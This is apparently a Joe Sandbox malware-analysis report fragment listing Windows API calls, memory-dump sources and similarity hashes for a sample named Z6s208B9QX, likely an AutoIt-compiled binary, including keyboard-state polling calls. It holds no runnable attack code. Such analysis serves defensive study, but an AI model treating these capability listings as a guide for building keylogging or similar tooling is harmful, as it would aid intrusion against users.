                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DestroyWindow
                                                                                                        • String ID: static
                                                                                                        • API String ID: 3375834691-2160076837
                                                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                        • API String ID: 2907320926-3566645568
                                                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                        • DeleteObject.GDI32(00550000), ref: 00470A04
                                                                                                        • DestroyIcon.USER32(00650073), ref: 00470A1C
                                                                                                        • DeleteObject.GDI32(528318DF), ref: 00470A34
                                                                                                        • DestroyWindow.USER32(006D0065), ref: 00470A4C
                                                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1237572874-0
                                                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                        APIs
                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706829360-0
                                                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$Async$Keyboard
                                                                                                        • String ID:
                                                                                                        • API String ID: 541375521-0
                                                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3413494760-0
                                                                                                        • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                        • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                        • String ID: AU3_FreeVar
                                                                                                        • API String ID: 2634073740-771828931
                                                                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                        • API String ID: 2294789929-1287834457
                                                                                                        • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                        • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                        APIs
                                                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                        • API String ID: 2483343779-2107944366
                                                                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                        • String ID: -----$SysListView32
                                                                                                        • API String ID: 4008455318-3975388722
                                                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                        • GetParent.USER32 ref: 00469C98
                                                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                        • GetParent.USER32 ref: 00469CBC
                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                        • String ID: ComboBox$ListBox
                                                                                                        • API String ID: 2360848162-1403004172
                                                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 262282135-0
                                                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 312131281-0
                                                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                        APIs
                                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                        • SendMessageW.USER32(760923D0,00001001,00000000,?), ref: 00448E16
                                                                                                        • SendMessageW.USER32(760923D0,00001026,00000000,?), ref: 00448E25
                                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                        Memory Dump Source
